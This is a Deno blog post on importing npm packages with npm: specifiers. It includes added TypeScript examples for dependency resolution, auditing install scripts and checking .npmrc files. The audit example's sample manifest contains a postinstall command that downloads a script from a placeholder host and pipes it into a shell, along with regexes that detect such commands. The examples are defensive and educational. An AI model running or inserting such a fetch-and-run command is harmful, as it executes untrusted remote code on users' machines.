If you're not using npm specifiers, you're doing it wrong | Deno
Andy Jiang · 2025-02-13 · via Deno

During the early days of Deno, we recommended importing npm packages via HTTP through transpile services such as esm.sh and unpkg.com. Importing npm packages this way has limitations, however: there are no install hooks, duplicate dependencies are hard to resolve, data files cannot be loaded, and so on. That's why, now that native npm support has shipped with Deno 2, we recommend using npm: specifiers directly.


// Before: an HTTP import through a transpile service
import React from "https://esm.sh/react@19";

// After: a native npm: specifier (recommended with Deno 2)
import React from "npm:react@19";

In this blog post, we’ll cover the limitations from using npm via these transpile services, as well as all the benefits to natively importing npm packages:

  • Limitations of hosted transpile services
    • Duplicate dependency issues
    • No install hooks and native add-ons
    • No data files
  • Benefits of natively importing npm packages
    • No node_modules
    • No package.json
    • Jupyter notebooks and REPL
    • Improved security
    • Private npm registries
  • What’s next

🚨️ Try Deno 2 today. 🚨️

Deno offers backwards compatibility with Node/npm, built-in package management, an all-in-one zero-config toolchain, native TypeScript support, and more.

Limitations of hosted transpile services

Duplicate dependency issues

When you import https://esm.sh/react and https://esm.sh/react-dom, the latter dependency might import a duplicate react version:

import react from "https://esm.sh/react";
import reactDom from "https://esm.sh/react-dom";

And while there are some ways to manage this via special esm.sh URL flags, they can be tedious and fiddly. Importing from esm.sh lacks semantic versioning, making it hard to dedup dependencies.

Conversely, importing from npm natively via npm: specifiers lets Deno understand the semantic versions of your dependencies, just as npm does with Node, so deduplication works as expected. The result is a smaller module graph and fewer loaded modules.
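To make the deduplication point concrete, here is an added example (not code from the Deno blog post or the Deno project) with a toy resolver. It models a constructed two-package registry and compares two loading strategies: identifying modules by URL string, where an unpinned `https://esm.sh/react` and a service-rewritten pinned `https://esm.sh/react@19.0.0` are two different modules, and resolving `npm:` specifiers by collecting every requester's semver range and picking one version that satisfies them all. The registry contents, the URL-rewriting rule, and the supported range syntax are all assumptions made for the demo.

```typescript
// Added example (not from the Deno blog post): a toy resolver showing why a
// runtime that understands semver (npm: specifiers) loads one copy of react,
// while URL imports are identified only by their URL string and can load two.
// The registry contents and the URL-rewriting rule are constructed for the demo.

type Manifest = { version: string; dependencies: Record<string, string> };
type Triple = [number, number, number];

// Constructed mini-registry: published versions per package, oldest first.
const REGISTRY: Record<string, Manifest[]> = {
  react: [
    { version: "18.3.1", dependencies: {} },
    { version: "19.0.0", dependencies: {} },
  ],
  "react-dom": [{ version: "19.0.0", dependencies: { react: "^19.0.0" } }],
};

function parseVersion(v: string): Triple {
  const p = v.split(".").map((x) => Number(x));
  return [p[0] || 0, p[1] || 0, p[2] || 0];
}

function compare(a: Triple, b: Triple): number {
  for (let i = 0; i < 3; i++) if (a[i] !== b[i]) return a[i] - b[i];
  return 0;
}

// Handles the subset of semver ranges used here: "*", "19", "19.0", "19.0.0", "^19.0.0".
function satisfies(version: string, range: string): boolean {
  if (range === "*" || range === "") return true;
  const v = parseVersion(version);
  const caret = range.charAt(0) === "^";
  const r = parseVersion(caret ? range.slice(1) : range);
  if (caret) return v[0] === r[0] && compare(v, r) >= 0;
  const depth = range.split(".").length;
  if (depth === 1) return v[0] === r[0];
  if (depth === 2) return v[0] === r[0] && v[1] === r[1];
  return compare(v, r) === 0;
}

// "npm:react@19" -> { name: "react", range: "19" }; "npm:@scope/pkg@^1.2.0" keeps the scope.
function parseNpmSpecifier(spec: string): { name: string; range: string } {
  if (spec.indexOf("npm:") !== 0) throw new Error("not an npm: specifier: " + spec);
  const body = spec.slice(4);
  const at = body.indexOf("@", 1); // skip the leading "@" of a scoped name
  return at === -1 ? { name: body, range: "*" } : { name: body.slice(0, at), range: body.slice(at + 1) };
}

// Collect every requester's range per package and choose the newest version
// that satisfies all of them, then walk that version's own dependencies.
// (A real resolver would nest a second copy on conflict; this toy throws.)
function resolveNpm(roots: string[]): Map<string, string> {
  const constraints: Record<string, string[]> = {};
  const chosen = new Map<string, string>();
  const queue = roots.map(parseNpmSpecifier);
  while (queue.length > 0) {
    const req = queue.shift() as { name: string; range: string };
    const ranges = (constraints[req.name] = constraints[req.name] || []);
    ranges.push(req.range);
    const candidates = (REGISTRY[req.name] || []).slice().reverse();
    const pick = candidates.filter((m) => ranges.every((r) => satisfies(m.version, r)))[0];
    if (!pick) throw new Error("no version of " + req.name + " satisfies " + ranges.join(", "));
    if (chosen.get(req.name) === pick.version) continue;
    chosen.set(req.name, pick.version);
    for (const dep of Object.keys(pick.dependencies)) queue.push({ name: dep, range: pick.dependencies[dep] });
  }
  return chosen;
}

// "https://esm.sh/react@19.0.0" -> "react" (unscoped names only, as in this demo).
function packageOf(url: string): string {
  return url.slice("https://esm.sh/".length).replace(/@.*$/, "");
}

// Constructed model of URL loading: identity is the URL string. A transpile
// service serving react-dom rewrites its internal "react" import to a pinned
// URL, which differs from the unpinned "https://esm.sh/react" the app imported.
function resolveUrl(roots: string[]): string[] {
  const loaded: string[] = [];
  const queue = roots.slice();
  while (queue.length > 0) {
    const url = queue.shift() as string;
    if (loaded.indexOf(url) !== -1) continue;
    loaded.push(url);
    const versions = REGISTRY[packageOf(url)] || [];
    const newest = versions[versions.length - 1];
    if (!newest) continue;
    for (const dep of Object.keys(newest.dependencies)) {
      const depVersions = REGISTRY[dep];
      queue.push("https://esm.sh/" + dep + "@" + depVersions[depVersions.length - 1].version);
    }
  }
  return loaded;
}

function copiesOf(name: string, urls: string[]): number {
  return urls.filter((u) => packageOf(u) === name).length;
}
```

Running `resolveUrl(["https://esm.sh/react", "https://esm.sh/react-dom"])` yields three modules, two of which are react, whereas `resolveNpm(["npm:react@19", "npm:react-dom@19"])` yields exactly one entry per package. Requesting `npm:react@18` next to `npm:react-dom@19` makes the toy resolver throw, which is where a real resolver would fall back to nesting a second copy; the point is that it can detect the overlap at all, which URL identity cannot.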

No install hooks and native add-ons

Some npm packages require native add-ons to be compiled at install time. When importing natively with npm, install hooks will run an install script that calls node-gyp to build the add-on.

Unfortunately, there are no install hooks when importing npm packages via HTTP, so npm packages that require a separate install step cannot be fully installed this way.

Deno’s native npm support allows install hooks to run with the --allow-scripts flag:

deno install --allow-scripts=npm:duckdb

No data files

Certain npm packages ship with non-JavaScript files, such as text files, CSV, JSON, etc., which they load at runtime. However, these transpile services are unable to serve a compatible version, which results in unusual errors and an overall subpar developer experience.

Importing npm packages natively in Deno is the same as importing in Node — data files are downloaded and can be accessed from the module at runtime, which is the expected behavior.

Benefits of natively importing npm packages

No node_modules

Programming is a battle against complexity. Any superfluous code, config, folders, processes, etc. can divert focus and mindshare from critical business logic. This is why Deno is zero config (with sane defaults) and has a complete built-in toolchain so you can dive right into writing code.

You can use npm: specifiers with Deno to install npm packages without creating a node_modules folder in your directory. This is because Deno installs the package into its global cache instead:

No node_modules folder

You can even use npm: specifiers in your deno.json:

No node_modules folder

Note that if you have a package.json present, Deno will automatically default to creating a node_modules folder, as many npm packages expect and require it. However, you can control whether a node_modules folder is created with the nodeModulesDir attribute in your deno.json.

No package.json

Sometimes you want to write a simple JavaScript or TypeScript program, and run it and share it without extra code or steps.

In Node, package.json is the dependency manifest, and it must accompany your program if you have any dependencies. If you were to share your program with someone else, they would need the package.json and would have to run an extra install step for those dependencies before they could run your program.

In Deno, you can inline npm: specifiers in your import statement (as well as package versions) so you don’t need package.json at all. You can share your code by sharing your JS or TS file. If someone else runs it with Deno, Deno will automatically download the correct dependencies, and your program will run the same way as it did on your machine. Fewer files, steps, and frustrations.

In fact, treating single file scripts without dependency manifests as “immutable scripts” can lead to creating ecosystems of composable programs.

Windmill.dev example with immutable scripts

Windmill.dev uses Deno’s optional dependency manifest to create immutable scripts, a foundational building block for their user-generated workflows.

Of course, you can always use package.json in cases where your dependencies might require one.

Importing npm and jsr packages is recommended in any Deno program — CLI, servers, libraries, etc. — even in other contexts where Deno is used, such as Jupyter notebooks and REPL. Let’s take a look at that next.

Jupyter notebooks and REPL

Deno’s jupyter support is great for exploring datasets in JavaScript/TypeScript, or even to use as a REPL (though you can use deno repl as well — more below).

You can use npm: directly in Jupyter notebooks so you can import key npm modules for data exploration, analysis, and even charting. Here’s an example of using npm:polars in Jupyter notebooks:

Jupyter notebooks with Deno

Working with data sets in JavaScript and TypeScript not only gives you many of the data libraries available in Python, but also lets you easily render your analysis to HTML. Here's an example using npm:@observablehq/plot:

Rendering HTML chart with JavaScript in Deno

Rendering an HTML chart with JavaScript via npm:@observablehq/plot and jsr:@ry/jupyter-helper.

Interested in using JS/TS to explore datasets in Deno jupyter? Here are some awesome libraries (and their Python counterparts) to help get you started:

You can also use npm: in your deno repl:

Importing npm packages in Deno repl

Note that just like any other Deno program, both Jupyter notebooks and REPL make use of your global cache for dependencies. That not only means less vendor clutter in your directories, but also faster execution once your dependencies are cached.

Improved security

In Node, when you import an npm module, that module has unfettered access to everything. And because npm modules are so deeply composable, there have been dozens of reported incidents of malicious npm modules stealing user data from forms, performing shell injection attacks, installing malware onto your machine, and more.

Deno, designed with security in mind from the outset, uses an opt-in permissions model that alerts you when any of your dependencies requests access to anything sensitive. For instance, npm:chalk requires access to several environment variables:

On top of the additional security layer that Deno's permission system provides, Deno also requires you to opt in to pre- and post-install scripts during npm installation. While certain npm packages need these lifecycle install scripts to work properly, the scripts also have full access to your system. Allowing them essentially lets the package author run arbitrary commands on your machine, in your CI environment, and so on, which is dangerous if you don't recognize the packages being installed.

In Deno, if you install an npm package that requires a lifecycle install script to execute, you’ll be prompted with the following warning message:

Permission prompt for lifecycle install scripts during npm install

To enable install scripts, you can use the --allow-scripts flag. Note that this flag can also accept parameters for specific package names, giving you not only more visibility, but also more granular control.
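Since --allow-scripts can be scoped to named packages, the useful preparatory step is knowing which packages in your dependency set declare lifecycle scripts at all and what those scripts do. The following is an added example (not code from the Deno blog post or the Deno project) that audits a set of package manifests for preinstall/install/postinstall entries, separates the common legitimate case (a node-gyp native build) from scripts that download or pipe into a shell and deserve a manual look, and assembles the flag for only the packages you have accepted. The manifests are constructed and the package names are placeholders; reading real manifests out of a lockfile or cache directory is left to the caller. The comma-separated form of the flag is assumed to be how several package names are passed.

```typescript
// Added example (not from the Deno blog post): audit which packages in a
// dependency set declare npm lifecycle install scripts, so --allow-scripts can
// be granted to specific reviewed packages rather than to everything.
// All manifests below are constructed; the package names are placeholders.

type PackageManifest = {
  name: string;
  version: string;
  scripts?: Record<string, string>;
};

// Lifecycle hooks that run automatically as part of installing a package.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

type Finding = {
  specifier: string;              // e.g. "npm:native-addon-example"
  hooks: Record<string, string>;  // hook name -> command
  buildsNativeAddon: boolean;     // invokes node-gyp or prebuild-install (the usual legitimate reason)
  fetchesOrPipesToShell: boolean; // downloads at install time or pipes into a shell: review by hand
};

function auditInstallScripts(manifests: PackageManifest[]): Finding[] {
  const findings: Finding[] = [];
  for (const m of manifests) {
    const hooks: Record<string, string> = {};
    for (const hook of INSTALL_HOOKS) {
      const cmd = m.scripts ? m.scripts[hook] : undefined;
      if (cmd) hooks[hook] = cmd;
    }
    if (Object.keys(hooks).length === 0) continue;
    const commands = Object.keys(hooks).map((h) => hooks[h]).join("\n");
    findings.push({
      specifier: "npm:" + m.name,
      hooks,
      buildsNativeAddon: /\bnode-gyp\b|\bprebuild-install\b/.test(commands),
      fetchesOrPipesToShell: /\b(curl|wget)\b|\|\s*(sh|bash)\b/.test(commands),
    });
  }
  return findings;
}

// Build the flag for only the packages you have reviewed and accept.
// Assumes several names are passed comma-separated, e.g. --allow-scripts=npm:a,npm:b.
function allowScriptsFlag(accepted: string[]): string {
  return accepted.length === 0 ? "" : "--allow-scripts=" + accepted.join(",");
}

// Packages whose only install-time behaviour is a native build are accepted
// automatically here; anything that fetches or pipes to a shell is not.
function acceptedByPolicy(findings: Finding[]): string[] {
  return findings
    .filter((f) => f.buildsNativeAddon && !f.fetchesOrPipesToShell)
    .map((f) => f.specifier);
}

// Constructed sample manifests (not real packages).
const SAMPLE_MANIFESTS: PackageManifest[] = [
  { name: "plain-lib", version: "1.0.0", scripts: { test: "node test.js" } },
  { name: "native-addon-example", version: "2.1.0", scripts: { install: "node-gyp rebuild" } },
  {
    name: "suspicious-example",
    version: "0.0.1",
    scripts: { postinstall: "curl -s https://example.invalid/setup.sh | sh" },
  },
];

function main(): void {
  const findings = auditInstallScripts(SAMPLE_MANIFESTS);
  for (const f of findings) {
    const tags = [
      f.buildsNativeAddon ? "native build" : "",
      f.fetchesOrPipesToShell ? "REVIEW: downloads or pipes to a shell" : "",
    ].filter((t) => t !== "");
    console.log(f.specifier, Object.keys(f.hooks).join(","), tags.join("; "));
  }
  console.log("deno install " + allowScriptsFlag(acceptedByPolicy(findings)));
}

main();
```

On the sample set, `plain-lib` has no install hooks and never appears, `native-addon-example` is accepted because its only install-time behaviour is a node-gyp build, and `suspicious-example` is listed for manual review, so the printed command is `deno install --allow-scripts=npm:native-addon-example`. The regexes are deliberately simple heuristics; a script that is not flagged is not thereby safe, which is why the policy function accepts only what it positively recognises.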

Private npm registries

Many large organizations host their own private npm registries to manage internal packages. Deno supports this in the same way Node does — with an .npmrc file to configure Deno to fetch packages from this private registry:

// .npmrc
@mycompany:registry=http://mycompany.com:8111/
//mycompany.com:8111/:_auth=secretToken

// deno.json
{
  "imports": {
    "@mycompany/package": "npm:@mycompany/package@1.0.0"
  }
}

// main.ts
import { hello } from "@mycompany/package";

console.log(hello());

$ deno run main.ts
Hello world!

You can also use private npm packages in your package.json file:

// package.json
{
  "dependencies": {
    "@mycompany/package": "1.0.0"
  }
}

// main.ts
import { hello } from "@mycompany/package";

console.log(hello());

$ deno run main.ts
Hello world!
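The .npmrc above does two things worth checking before it is copied into a real project: it maps a scope to a registry and it attaches a credential to that registry's host. The following added example (not code from the Deno blog post or the Deno project) parses a file of that shape, resolves which registry a package name would be fetched from, and flags the two weak spots in the sample: the registry is reached over plain http://, and the token is written into the file as a literal. The sample text follows the post's with the token replaced by an obvious placeholder; the hardened variant uses https:// and npm's `${VAR}` environment-expansion syntax, which the checker treats as not hard-coded.

```typescript
// Added example (not from the Deno blog post): parse an .npmrc of the shape
// shown above, resolve the registry a package comes from, and flag a plaintext
// http:// registry and a credential stored as a literal in the file.
// The sample configuration is constructed; the token value is a placeholder.

type NpmrcConfig = {
  defaultRegistry?: string;
  scopeRegistries: Record<string, string>;             // "@mycompany" -> registry URL
  credentials: Record<string, Record<string, string>>; // "//host:port/" -> { _auth: "..." }
};

const CREDENTIAL_KEYS = ["_auth", "_authToken", "_password"];

function parseNpmrc(text: string): NpmrcConfig {
  const cfg: NpmrcConfig = { scopeRegistries: {}, credentials: {} };
  for (const raw of text.split("\n")) {
    const line = raw.trim();
    // ";" and "#" start comments. A leading "//" is NOT a comment in .npmrc:
    // it begins a registry-scoped setting such as "//host/:_auth=...".
    if (line === "" || line.charAt(0) === ";" || line.charAt(0) === "#") continue;
    const eq = line.indexOf("=");
    if (eq === -1) continue;
    const key = line.slice(0, eq).trim();
    const value = line.slice(eq + 1).trim();
    if (key === "registry") {
      cfg.defaultRegistry = value;
    } else if (key.charAt(0) === "@" && key.endsWith(":registry")) {
      cfg.scopeRegistries[key.slice(0, key.length - ":registry".length)] = value;
    } else if (key.indexOf("//") === 0) {
      // The host part itself may contain ":" (a port), so split on the last one.
      const colon = key.lastIndexOf(":");
      const host = key.slice(0, colon);
      const field = key.slice(colon + 1);
      cfg.credentials[host] = cfg.credentials[host] || {};
      cfg.credentials[host][field] = value;
    }
  }
  return cfg;
}

// Registry a package name resolves to; undefined means the public default registry.
function registryFor(pkg: string, cfg: NpmrcConfig): string | undefined {
  const scope = pkg.charAt(0) === "@" ? pkg.slice(0, pkg.indexOf("/")) : "";
  return cfg.scopeRegistries[scope] || cfg.defaultRegistry;
}

function checkNpmrc(cfg: NpmrcConfig): string[] {
  const issues: string[] = [];
  const registries = Object.keys(cfg.scopeRegistries).map((s) => cfg.scopeRegistries[s]);
  if (cfg.defaultRegistry) registries.push(cfg.defaultRegistry);
  for (const url of registries) {
    if (url.indexOf("http://") === 0) {
      issues.push("registry " + url + " is plain HTTP: packages and credentials cross the network unencrypted");
    }
  }
  for (const host of Object.keys(cfg.credentials)) {
    for (const field of CREDENTIAL_KEYS) {
      const value = cfg.credentials[host][field];
      // npm expands ${VAR} from the environment; anything else is a literal secret on disk.
      if (value !== undefined && !/^\$\{[A-Za-z_][A-Za-z0-9_]*\}$/.test(value)) {
        issues.push(host + " stores " + field + " as a literal in .npmrc: keep it out of the file and out of version control");
      }
    }
  }
  return issues;
}

// Constructed sample in the shape of the post's .npmrc, token replaced by a placeholder.
const SAMPLE_NPMRC = [
  "@mycompany:registry=http://mycompany.com:8111/",
  "//mycompany.com:8111/:_auth=PLACEHOLDER_TOKEN",
].join("\n");

// Hardened variant: TLS transport and a token supplied from the environment.
const HARDENED_NPMRC = [
  "@mycompany:registry=https://mycompany.com:8111/",
  "//mycompany.com:8111/:_authToken=${NPM_TOKEN}",
].join("\n");

function main(): void {
  for (const text of [SAMPLE_NPMRC, HARDENED_NPMRC]) {
    const cfg = parseNpmrc(text);
    console.log("@mycompany/package ->", registryFor("@mycompany/package", cfg));
    const issues = checkNpmrc(cfg);
    console.log(issues.length === 0 ? "no issues" : issues.join("\n"));
  }
}

main();
```

For the sample, `registryFor("@mycompany/package", cfg)` returns the private registry URL while an unscoped name such as `react` falls through to the default, and `checkNpmrc` reports two issues; the hardened variant reports none. The parser handles only the `key=value` lines the post uses; it is not a full .npmrc implementation.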

What’s next

While Deno will always support HTTP imports, since they follow the web's native module model, we recommend defaulting to npm: or jsr: specifiers with Deno 2 and above.

To learn more about what npm packages and frameworks you can use with Deno 2, check out our tutorials: